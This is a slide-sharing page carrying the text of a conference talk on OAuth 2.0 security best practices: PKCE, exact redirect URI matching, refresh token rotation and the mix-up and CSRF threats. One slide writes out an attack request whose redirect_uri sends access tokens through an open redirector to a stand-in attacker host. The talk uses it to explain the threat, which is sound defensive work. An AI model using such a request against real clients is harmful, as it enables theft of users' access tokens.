oauth 2 0 security reinforced
play

OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt - PowerPoint PPT Presentation

Nov 19, 2022 •281 likes •594 views

OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt Daniel Fett @dfett42 yes.com AG The OAuth 2.0 Success Story Tremendous adoption since publication in 2012 Driven by large service providers and OpenID Connect

  1. OAuth 2.0 Security Reinforced Torsten Lodderstedt @tlodderstedt Daniel Fett @dfett42 yes.com AG

  2. The OAuth 2.0 Success Story ● Tremendous adoption since publication in 2012 ● Driven by large service providers and OpenID Connect ● Key success factors: simplicity & versatility ● BUT: Old and new security challenges!

  3. Challenge 1: Implementation Flaws ● We still see many implementation flaws ○ E.g., Facebook hack

  4. Challenge 1: Implementation Flaws ● We still see many implementation flaws ○ E.g., Facebook hack ● Documented anti-patterns are still used ○ E.g., insufficient redirect URI checking, CSRF, open redirection Redirect URI matching with broad Regex https://*.somesite.example/*.

  5. Challenge 1: Implementation Flaws ● We still see many implementation flaws ○ E.g., Facebook hack ● Documented anti-patterns are still used ○ E.g., insufficient redirect URI checking, CSRF, open redirection ● Technological changes haven’t simplified the situation ○ E.g., URI fragment handling in browsers.

  6. Open Redirection + Fragment Handling (Example) Attacker AS/RS Alice cl.com User evil.example Redirect to https://as.example/authorize?response_type=token&redirect_uri= https://cl.com/authok?resume_at=https://evil.example/harvest&... GET /authorize?response_type=token&redirect_uri= https://cl.com/authok?resume_at=https://evil.example/harvest User authenticates & consents Redirect to cl.com/authok?resume_at…# access_token=foo23 &… GET /authok?…# access_token … Attacker can read access token! open redirector Redirect to evil.example/harvest# access_token GET /harvest# access_token=foo23 Open redirection and fragment forwarding* GET /authorize ?response_type=token ... &redirect_uri= https://client.somesite.example/cb?resume_at=https://evil.example/harvest HTTP/1.1 Host: server.somesite.example *URI encoding omitted for readability

  7. Challenge 2: High-Stakes Environments New Use Cases, e.g. Open Banking, require a very high level of security Financial Grade API HEART WG iGov Profile Also: eIDAS/QES (legally binding electronic signatures) and eHealth Far beyond the scope of the original security threat model!

  8. Challenge 3: Dynamic Use-Cases Originally anticipated: Client One trustworthy OAuth provider, statically configured per client Resource Server Authorization Server Resource Server Resource Server OAuth Provider

  9. Challenge 3: Dynamic Use-Cases Today: Multiple AS/RS per client Authorization Server Authorization Server Client Resource Server Resource Server Mix-Up Attack! Resource Server Resource Server Resource Server Resource Server OAuth Provider B OAuth Provider A Dynamic relationships Resource Server Authorization Server Resource Server Resource Server Not all entities OAuth Provider C are trustworthy!

  10. OAuth 2.0 Security Best Current Practice ● Refines and enhances security guidance for OAuth 2.0 implementers ● Updates, but does not replace: ○ OAuth 2.0 Threat Model and Security Considerations (RFC 6819) ○ OAuth 2.0 Security Considerations (RFC 6749 & 6750) ● Updated, more comprehensive Threat Model ● Description of Attacks and Mitigations ● Simple and actionable recommendations

  11. Recommendations

  12. Don’t use the OAuth Implicit Grant any longer! User AS/RS Threat: Access token Redirect to Authorization Server leakage from web application (XSS, browser GET /authorize?... history, proxies, operating systems, ...) Threat: Access token replay! User authenticates & consents Redirect to rp.com/authok# access_token=foo23 &... Access token available in web application Use access_token (Single-Page Apps) Threat: Access token injection! Send access_token (Non-SPA) Use access_token

  13. The Implicit Grant ... ● sends powerful and potentially long-lived tokens through the browser, ● lacks features for sender-constraining access tokens, ● provides no protection against access token replay and injection , and ● provides no defense in depth against XSS, URL leaks, etc.! Why is Implicit even in RFC6749? No Cross-Origin Resource Sharing in 2012! Recommendation ⇒ No way of (easily) using OAuth in SPAs. “Clients SHOULD NOT use the implicit grant [...]” ⇒ Not needed in 2019! “Clients SHOULD instead use the response type code (aka authorization code grant type) [...]”

  14. Authorization Code Grant with PKCE & mTLS Mitigation: PKCE - Code only useful with code_verifier User AS/RS - Code injection prevent by PKCE. Redirect to Authorization Server Recommendation GET /authorize? code_challenge=sha256xyz &... “Clients utilizing the authorization grant type MUST use PKCE [...]” ... “Authorization servers SHOULD use TLS-based methods for Redirect to rp.com/authok? code=bar42 &... sender-constrained access tokens [...]” Send code POST /token, code=bar42 Mitigation: Single-use Code & code_verifier=xyz ... Double use leads to access token invalidation! Send access_token Mitigation: Sender-Constrained Token Use access_token E.g., access token bound to mTLS certificate.

  15. Mix-Up Prevention ● Clients must be able to see originator of authorization response ○ AS-specific redirect URIs ○ Alternative: issuer in authorization response for OpenID Connect ● Clients must keep track of desired AS (explicit tracking)

  16. Redirections Gone Wild? ● Enforce exact redirect URI matching ○ Simpler to implement on AS side ○ Adds protection layer against open redirection ● Clients MUST avoid open redirectors! ○ Use whitelisting of target URLs or authenticate redirection request

  17. CSRF Protection RFC6749 and RFC6819: state recommended ● ● Current draft for BCP: mandatory to use state ! ○ Important addition: state MUST be one-time use! ○

  18. Limit Privileges of Access Tokens ● Sender-constraining (mTLS or HTTP Token Binding) ● Receiver-constraining (only valid for certain RS) ● Reduce scope - defense in depth!

  19. Refresh Tokens User AS/RS ... Send code POST /token, code=... access_token¹ refresh_token¹ Access Token: Narrow scope and limited lifetime! Use access_token¹ Access Token expires. POST /token, refresh_token¹ access_token² Use access_token²

  20. Refresh Tokens ● UX-friendly way to obtain new access tokens ● Allows for access tokens with narrow scope and short lifetime (Security!) ● BUT: Attractive target since refresh tokens represent overall grant ● Requirement: Protection from theft and replay ○ Client Binding and Authentication ■ Confidential clients only ○ Sender-Constrained Refresh Tokens ■ mTLS now supports this even for public clients ○ Refresh Token Rotation ■ For public clients unable to use mTLS

  21. Refresh Token Rotation 1. AS issues fresh refresh token with every access token refresh and invalidates old refresh token (and keeps track of refresh tokens belonging to the same grant) 2. If a refresh token is compromised subsequently used by both the attacker and the legitimate client, one of them will present an invalidated refresh token, which will inform the AS server of the breach. 3. AS cannot determine which party submitted refresh token but it can revoke the active refresh token in order to force re-authorization by the Resource Owner

  22. Refresh Token Rotation User AS/RS Access Token expires. POST /token, refresh_token¹ access_token² refresh_token² Fresh refresh token with every token request! POST /token, refresh_token ² access_token³ refresh_token³ POST /token, refresh_token ³ access_token⁴ refresh_token⁴ ...

  23. Refresh Token Rotation User Attacker AS/RS Access Token expires. POST /token, refresh_token¹ access_token² refresh_token² Leakage: refresh_token² POST /token, refresh_token ² access_token³ refresh_token³ POST /token, refresh_token² refresh_token¹²³ Invalidate access_token¹²³

  24. Refresh Token Rotation User Attacker AS/RS Access Token expires. POST /token, refresh_token¹ access_token² refresh_token² Leakage: refresh_token² POST /token, refresh_token² access_token³ refresh_token³ POST /token, refresh_token ² refresh_token¹²³ Invalidate access_token¹²³

  25. Additional Recommendations ● Prohibit HTTP 307 for redirections ● Try to prevent code leakage from referrer headers and browser history ○ Already common practice among implementers ○ Only first of two lines of defense now ● Use client authentication if possible

  26. Trigger: Mix-Up Attacks 2016 Where are we now? Current Version: -12 Fix Open Issues Push for Publication 2019?

  27. What is left to do?

  28. Open Issues (1) ● Use of OAuth (tokens) in SPAs ○ Code is OK ○ mTLS does not work in SPAs in practice ○ Token binding has uncertain status ○ XSS is prevalent ● Client Authentication Methods? ○ Recommendation of public crypto methods in favor of client secrets? ○ Especially in ecosystems 2 parties ⇒ n parties

  29. Open Issues (2) ● Secure transmission of rich authorization requests lodging intent and/or request_uri ? ○ Threat: scope swapping ○ Do we really need state for CSRF protection any longer? ● ○ PKCE supersedes state! (Not in implicit, though.) state can regain its original purpose: carry application state ○ ○ Let’s discuss this during the unconference!

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical

OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical

OAuth 2.0 for Browser Based Apps OAuth Security Workshop 2019 David Waite, Principal Technical Architect, Ping Identity Purpose Best Current Practices Document Builds mostly on RFC 8252 - OAuth 2.0 for Native Apps I-D

386 views • 10 slides
OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth

OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth

OAuth 2.0 Weina Ma Weina.Ma@uoit.ca Agenda OAuth overview Simple example OAuth protocol workflow Server-side web application flow Client-side web application flow Whats the problem As the web grows, more and more sites

786 views • 45 slides
Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2

Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2

Wherefore Art Thou, OAuth? 1 What is OAuth? 2 What is OAuth? Your Valet Key for the Web 2 What is OAuth? Your Valet Key for the Web Delegated Authentication Protocol 2 What is OAuth? Your Valet Key for the Web Delegated Authentication

357 views • 33 slides
OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu Antonio Sanso (@asanso) Software

OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu Antonio Sanso (@asanso) Software

OAuth Hacks A Gentle Introduction to OAuth 2.0 and Apache Oltu Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 .eyJhdWQiOiJjb25uZWN0MjAxNCIsImlzc

869 views • 42 slides
Glass Fiber Reinforced Concrete What is Glass Fiber Reinforced Concrete Glass-fiber Reinforced

Glass Fiber Reinforced Concrete What is Glass Fiber Reinforced Concrete Glass-fiber Reinforced

Glass Fiber Reinforced Concrete What is Glass Fiber Reinforced Concrete Glass-fiber Reinforced Concrete (GFRC) is a cement-based composite material reinforced with alkali-resistant fibers. The fibers add flexural, tensile and impact strength

990 views • 58 slides
Signing HTTP Requests and Responses Dave Tonge, OAuth Security Workshop 2019 Use case:

Signing HTTP Requests and Responses Dave Tonge, OAuth Security Workshop 2019 Use case:

Signing HTTP Requests and Responses Dave Tonge, OAuth Security Workshop 2019 Use case: Non-repudiation for backend JSON API calls Example 1: A payment request sent as a JSON payload to an API endpoint Example 2: A JSON API response from

369 views • 5 slides
OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF

OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF

* OAuth 2.0 Authorization Server Discovery Metadata draft-ietf-oauth-discovery Mike Jones IETF 95, Buenos Aires April 2016 1 Document Status Current draft addresses WGLC feedback See

423 views • 8 slides
A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle

A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle

A Formal Model for Delegated Authorization of IoT Devices Using ACE-OAuth LUCA ARNABOLDI, Newcastle University, UK HANNES TSCHOFENIG, Arm Limited, UK As our daily lives become ever more connected, the need for security becomes more important. This

164 views • 13 slides
BEST Reinforced Concrete Column Reinforced concrete design according to DIN, EN with

BEST Reinforced Concrete Column Reinforced concrete design according to DIN, EN with

BEST Reinforced Concrete Column Reinforced concrete design according to DIN, EN with national annexes for DE, AT, SK/CZ and UK Calculation according to the linear and nonlinear theory under consideration of effective stiffness in

118 views • 8 slides
OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106

OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106

draft-fett-oauth-dpop-03 OAuth 2.0 D emonstration of P roof- o f- P ossession at the Application Layer ( DPoP ) IETF 106 Singapore Nov 2019 Brian Campbell (presenter, co-author, workation photographer) John Bradley (co-author of sorts) Torsten

407 views • 19 slides
Edge-Reinforced Random Walk, Vertex-Reinforced Jump Process and the second generalised Ray-Knight

Edge-Reinforced Random Walk, Vertex-Reinforced Jump Process and the second generalised Ray-Knight

Edge-Reinforced Random Walk, Vertex-Reinforced Jump Process and the second generalised Ray-Knight theorem Pierre Tarrs, University of Oxford (joint work with Christophe Sabot) Bath, 23 June 2014 CONTENTS I) DEFINITION of Vertex-Reinforced

515 views • 17 slides
Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se)

Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se)

Authorization for IoT using OAuth draft-seitz-ace-oauth-authz-00 Ludwig Seitz (ludwig@sics.se) Gran Selander (goran.selander@ericsson.com) Erik Wahlstrm (erik.wahlstrom@nexusgroup.com) Samuel Erdtman (samuel.erdtman@nexusgroup.com) Hannes

147 views • 10 slides
Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and

Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and

Identity Management Hannes Tschofenig Motivation OAuth was created to allow secure and privacy friendly sharing of data. OAuth is not an authentication protocol. Works with any user authentication protocol (e.g., OATH, FIDO, W3C

613 views • 10 slides
A Glimpse on FRP (Fiberglass Reinforced Plastics) (Fiberglass Reinforced Plastics) Presented

A Glimpse on FRP (Fiberglass Reinforced Plastics) (Fiberglass Reinforced Plastics) Presented

A Glimpse on FRP (Fiberglass Reinforced Plastics) (Fiberglass Reinforced Plastics) Presented by: Mr. Vishal Gosai Fibre Glass Processors Rajkot Email : fgpindia@yahoo.co.uk Mobile no : +91-98252 19781 Web : www.fibreglassprocessors.co.in

759 views • 27 slides
STRUCTURAL BEHAVIOUR OF REINFORCED CONCRETE COLUMNS REINFORCED WITH VARIOUS MATERIALS Prof.Y B I

STRUCTURAL BEHAVIOUR OF REINFORCED CONCRETE COLUMNS REINFORCED WITH VARIOUS MATERIALS Prof.Y B I

18 TH INTERNATIONAL CONFERENCE ON COMPOSITE MATERIALS STRUCTURAL BEHAVIOUR OF REINFORCED CONCRETE COLUMNS REINFORCED WITH VARIOUS MATERIALS Prof.Y B I Shaheen 1 , Dr. M. Hassanen 2 1 Department Civil Engineering, Shebin El Kom, Egypt, 2

861 views • 6 slides
Browser Support for the Open Authoriza4on (OAuth) Protocol

Browser Support for the Open Authoriza4on (OAuth) Protocol

Browser Support for the Open Authoriza4on (OAuth) Protocol hGp://www.w3.org/2011/iden4ty-ws/papers/idbrowser2011_submission_32.pdf Hannes Tschofenig, Barry Leiba, Blaine Cook,

434 views • 8 slides
Stateless Microservice Security via JWT, TomEE and MicroProfile Jean-Louis Monteiro Tomitribe

Stateless Microservice Security via JWT, TomEE and MicroProfile Jean-Louis Monteiro Tomitribe

EclipseCon France Stateless Microservice Security via JWT, TomEE and MicroProfile Jean-Louis Monteiro Tomitribe #RESTSecurityWithMP-JWT @JLouisMonteiro @tomitribe EclipseCon France Why am I here today? Microservices architecture case

1.26k views • 69 slides
2nd Meeting of ICAC Federated Identity Status & Plans Mine Altunay October 15, 2019 Current

2nd Meeting of ICAC Federated Identity Status & Plans Mine Altunay October 15, 2019 Current

2nd Meeting of ICAC Federated Identity Status & Plans Mine Altunay October 15, 2019 Current Status Adoption of Federated Identity and Access Control is one of the top priorities for the lab Crucial for our success with DUNE,

403 views • 13 slides
Complex architectures for authentication and authorization on AWS Boyan Dimitrov Director

Complex architectures for authentication and authorization on AWS Boyan Dimitrov Director

Complex architectures for authentication and authorization on AWS Boyan Dimitrov Director Platform Engineering @ Sixt @nathariel September 2019 Our Focus Today ? Authenticate Key patterns for authentication & Authorize and

510 views • 38 slides
@PhilippeDeRyck 3 @PhilippeDeRyck 4 @PhilippeDeRyck 5 3 Who that? 4 It's me, Philippe! 2

@PhilippeDeRyck 3 @PhilippeDeRyck 4 @PhilippeDeRyck 5 3 Who that? 4 It's me, Philippe! 2

A UTHENTICATION WITH O PEN ID C ONNECT IN A NGULAR D R . P HILIPPE D E R YCK https://Pragmatic Web Security.com D R . P HILIPPE D E R YCK - Deep understanding of the web security landscape - Google Developer Expert (not employed by Google) -

1.23k views • 44 slides
The Protocol Founded in 1999 >100 persons Clment OUDOT Montral, Quebec City,

The Protocol Founded in 1999 >100 persons Clment OUDOT Montral, Quebec City,

The Protocol Founded in 1999 >100 persons Clment OUDOT Montral, Quebec City, Ottawa, Paris @clementoudot ISO 9001:2004 / ISO 14001:2008 contact@savoirfairelinux.com GET /summary { part1:Some words on OAuth

796 views • 48 slides
Bringing Collabora Online to your web-app its easy ... Collabora Productjvity Michael Meeks

Bringing Collabora Online to your web-app its easy ... Collabora Productjvity Michael Meeks

CS3 2020 Bringing Collabora Online to your web-app its easy ... Collabora Productjvity Michael Meeks <michael.meeks@collabora.com> General Manager at Collabora Productjvity @michael_meeks, mmeeks #libreoffjce-dev irc.freenode.net

821 views • 60 slides
Web Security: Sessions; CSRF; start on authentication CS 161: Computer Security Prof. Raluca

Web Security: Sessions; CSRF; start on authentication CS 161: Computer Security Prof. Raluca

Web Security: Sessions; CSRF; start on authentication CS 161: Computer Security Prof. Raluca Ada Popa Nov 10, 2016 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh Announcements Proj 3

1.32k views • 66 slides
Session Subtyping and Multiparty Compatibility using Circular Sequents 31st International

Session Subtyping and Multiparty Compatibility using Circular Sequents 31st International

Session Subtyping and Multiparty Compatibility using Circular Sequents 31st International Conference on Concurrency Theory (CONCUR 2020) Adapted for Mobility Reading group 22/10/2020. Ross Horne Computer Science, University of Luxembourg 1-4

546 views • 35 slides

More recommend